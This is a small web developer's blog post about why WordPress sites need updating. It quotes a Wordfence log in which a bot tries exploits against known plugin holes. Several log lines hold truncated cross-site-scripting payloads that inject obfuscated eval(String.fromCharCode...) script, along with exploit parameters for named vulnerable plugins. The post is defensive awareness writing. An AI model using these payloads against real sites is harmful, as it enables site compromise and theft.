Blog

Working with companies of all sizes to make the most of the internet.

Why updating WordPress Matters

by | 14th June 2019 | 0 comments

I often bang on about keeping your WordPress website updated, sometimes I feel like a bit of a stuck record but emails like the one below serve to remind us why its so important.

The details below came from an email send to me by WordFence a firewall plugin I tend to install on all WordPress sites that I look after, what each line shows is a fully automated attack against a known vulnerability, a hole so to speak that has already been fixed in a newer version of WordPress, however if the site being attacked is still running an old version, then any one of these attacks could give control of the site to the attacker.

Each line shows a bot attempting a different hack just seconds apart, and will keep going until either it gets in or has tried every attack it knows.

June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for WP GDPR Compliance <= 1.4.2 – Update Any Option / Call Any Action in POST body: action=wpgdprc_process_action
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for WP GDPR Compliance <= 1.4.2 – Update Any Option / Call Any Action in POST body: action=wpgdprc_process_action
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Total Donations (all known versions) – Multiple Unauthenticated AJAX Actions
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Newspaper Premium Theme <= 6.7.1 – Privilege Escalation
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=test
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=test
June 14, 2019 3:38am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:38am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:38am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:38am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê

June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: otw_pctl_custom_css=</textarea><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61,ê
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: otw_pctl_custom_css=</textarea><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61,ê
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: wp-piwik=<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 100, 111, ê
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: wp-piwik=<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 100, 111, ê
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: domain=</script><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 1ê
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:49am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:49am  192.241.166.230 (United States)     Blocked for Blog Designer <= 1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:49am  192.241.166.230 (United States)     Blocked for Blog Designer <= 1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê

So how how do you know which version of WordPress you have? simple log into your dashboard and have a look at the at a glance section, in the screenshot below you can see this site (at the time of writing) is running version 5.2.1. You can always find out what the current version is at https://wordpress.org/news/category/releases/

Once you know which version of WordPress you are running you can see how many known vulnerabilities there are over at the CVE details database. But to give you a rough idea, if your website is 2 years old, and hasn’t had WordPress updated you have at least 43 vulnerabilities, that’s 43 ways your website could be hacked. I say at least because that doesn’t include old versions of plugins and themes.

Simply put, you need to keep your website up to date, and doing so is pretty easy, although if you don’t feel comfortable doing it yourself,  you can always get someone like me to do it for you.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *